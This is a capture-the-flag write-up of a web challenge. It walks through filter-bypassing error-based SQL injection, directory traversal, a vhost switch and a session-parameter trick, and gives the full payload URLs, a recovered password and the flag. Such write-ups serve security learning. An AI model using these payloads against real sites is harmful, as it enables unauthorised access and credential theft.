This task gave us a portal to hack and we are asked to retrive a secret from this site. Fuzzing around we found an SQL injection here:
http://188.40.18.70/PROFILE/58\/KiTTyKiTTy
The query looks like this as you can see from the source:
SELECT * FROM users WHERE id_user='58\' AND Us3rN4m3='KiTTyKiTTy'
The script filter some characters like ' , (whitespace) , ; , etc.. But that’s not a real problem since we can still inject our payload like:
http://188.40.18.70/PROFILE/58\/'=(select(1))%2523
So now since the error are enabled we can use error-based SQL injection for retrive the column names from the table users and have a look inside it:
http://188.40.18.70/PROFILE/58\/=(select*from(select*from(select*from`users`)`a`join(select*from`users`)`b`using(id_user))a)%2523
This will give us the username column named: Us3rN4m3 . For get the remaining column names just add each column you find in the using statemant in the SQL query above like : using(id_user,Us3rN4m3,P4sWW0rD_0F_M3_WTF).
Now we can get from the database the password of user KiTTyKiTTy to login into the portal:
http://188.40.18.70/PROFILE/58\/=extractvalue(0,Concat(0x3a,(select(P4sWW0rD_0F_M3_WTF)from`users`where(id_user)=54)))%2523
which is ‘sd654egezjniufsdqc89q7d65azd123wxcbqyuslkdz65756sd’ (youll only see part of it in the error displayed. Just play with substr() and you’ll get the whole one).
After login you can see an interesting feature that invovles a directory browser and a file uploader. This last feature isn’t working sadly so we just focused on the director browser which lead to a directory traversal vulnerability. Infact we were able to see the whole file system tree. For example this directory:
http://188.40.18.70/ACCESS?action=browse&dir=../../__WebSiteFuckingPrivateContentNotForPublic666/
contains the source code for the login, logout, members, etc.. pages which can be downloaded like this:
http://188.40.18.70/__WebSiteFuckingPrivateContentNotForPublic666/MEMBERS
http://188.40.18.70/__WebSiteFuckingPrivateContentNotForPublic666/ACCESS
After a while we found a cute folder right here:
http://188.40.18.70/ACCESS?action=browse&dir=../../../../../home/devilish.local
Seems like a www directory right ? So we tryed to change the vhost from 188.40.18.70 to devilish.local and a new page came up! Now in devilish.local there was another semi-hidden directory named __WebSiteFuckingPrivateContentNotForPublic666+666 and its content was pretty much the same as the one we found before. We tryed then to download the sources contained in that directory for example the one of LOGIN_HEAD and we noticed a weird thing:
if(@$_SESSION['is_ExclusiveMember']){header("location: ".$LINK);die();}
if(isset($_POST['user'])){
if(@$_POST['user']===$uLOGIN && @$_POST['pass']===$uPASSWORD){
$_SESSION['is_ExclusiveMember']=1;
header("location: ".$LINK);
die();
}else{
$Error=1;
}
}
Also the one of INDEX was interesting:
<?php echo($logged?"Here's your secret ".$flag."<br/><br/>":"Login to access the secret<br/><br/>")?>
Seems like we need to know $uLOGIN and $uPASSWORD for login and get the flag but we don’t :( . So any other ideas? We supposed then that maybe ‘is_ExclusiveMember’ could be a hidden POST parameter supplied at the login and will be then assigned to $_SESSION[‘is_ExclusiveMember’] if the login was correct. We tryed it and it worked! Infact once logged with this payload:
user=KiTTyKiTTy&pass=sd654egezjniufsdqc89q7d65azd123wxcbqyuslkdz65756sd&is_ExclusiveMember=1
and go back to the devilish.local vhost homepage we got our flag: 31c3_Th3r3_4R3_D3v1li5h_Th0ght5_ev3N_1N_th3_M0sT_4ng3l1c_M1nd5
nurfed, Razor4x
<span class="comment"> </span>